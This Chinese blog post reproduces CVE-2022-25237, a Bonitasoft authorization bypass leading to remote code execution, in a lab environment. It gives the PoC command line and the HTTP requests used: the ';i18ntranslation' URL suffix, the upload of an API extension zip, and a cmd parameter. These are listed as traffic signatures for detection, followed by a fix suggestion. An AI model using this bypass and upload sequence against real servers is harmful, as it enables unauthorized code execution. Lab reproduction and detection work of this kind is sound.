CVE-2022-25237 Bonitasoft Platform RCE漏洞复现

目录

0x01 声明:

0x02 简介:

0x03 漏洞概述:

0x04 影响版本:

For community(社区版):

For subscription(订阅版):

0x05 环境搭建:

Vulfocus环境搭建:

漏洞环境搭建:

访问页面:

0x06 漏洞复现:

创建用户:

利用POC:

0x07 流量分析:

特征一:

客户端:

服务端:

特征二:

客户端:

服务端:

特征三:

客户端:

服务端:

特征四:

客户端:

服务端:

0x08 修复建议:

0x09参考连接:


0x01 声明:

        仅供学习参考使用,请勿用作违法用途,否则后果自负。

0x02 简介:

    Bonitasoft 是一个业务自动化平台,可以更轻松地在业务流程中构建、部署和管理自动化应用程序;Bonita 是一个用于业务流程自动化和优化的开源和可扩展平台。

0x03 漏洞概述:

    在Bonitasoft Authorization漏洞版本,由于 API 授权过滤器中配置问题,通过精心构造的的字符串附加到 API URL,能够绕过权限认证。拥有普通用户权限的攻击者在绕过权限认证后,将恶意代码部署到服务器上,进行远程代码执行。

0x04 影响版本:

For community(社区版):

2022.1-u0 (7.14.0) 以下

For subscription(订阅版):

2022.1-u0 (7.14.0) 以下

2021.2-u4 (7.13.4) 以下

2021.1-0307 (7.12.11) 以下

7.11.7 以下

0x05 环境搭建:

Vulfocus环境搭建:

参考这篇文章:

(7条消息) Vulfocus漏洞靶场搭建_Evan Kang的博客-CSDN博客https://blog.csdn.net/qq_44281295/article/details/127022162

漏洞环境搭建:

在Vulfocus环境后台执行:

docker pull bonita:7.13.0

访问页面:

0x06 漏洞复现:

创建用户:

默认账号密码:install/install

利用POC:

下载地址:

https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2022-25237

python CVE-2022-25237.py poc poc http://192.168.119.155:43378/bonita 'uname -a'

0x07 流量分析:

特征一:

客户端:

Url:POST /bonita/loginservice HTTP/1.1

Data:username=poc&password=poc

服务端:

Status_code:HTTP/1.1 204

特征二:

客户端:

Url: POST /bonita/API/pageUpload;i18ntranslation?action=add HTTP/1.1

Content-Disposition: form-data; name="file"; filename="rce_api_extension.zip"

服务端:

Status_code:HTTP/1.1 200

Data:{"filename":"rce_api_extension.zip","tempPath":"tmp_9332037509706769580.zip","contentType":"application\/octet-stream"}

特征三:

客户端:

Url:POST /bonita/API/portal/page/;i18ntranslation HTTP/1.1

Data:{"contentName": "rce_api_extension.zip", "pageZip": "tmp_9332037509706769580.zip"}

服务端:

Status_code:HTTP/1.1 200

Data:{"processDefinitionId":"","updatedBy":"1","urlToken":"custompage_resourceNameRestAPI","displayName":"RCE","lastUpdateDate":"2022-10-19 09:12:08.054","description":"REST API to manage resourceName","creationDate":"2022-10-19 09:12:08.054","contentName":"rce_api_extension.zip","isHidden":"false","isEditable":"true","createdBy":"1","isProvided":"false","id":"35","isRemovable":"true","contentType":"apiExtension"}

特征四:

客户端:

Url:GET /bonita/API/extension/rce?p=0&c=1&cmd='uname HTTP/1.1

服务端:

Status_code:HTTP/1.1 403

0x08 修复建议:

更新至安全无漏洞版本。

0x09参考连接:

https://rhinosecuritylabs.com/application-security/cve-2022-25237-bonitasoft-authorization-bypass/

  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Evan Kang

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值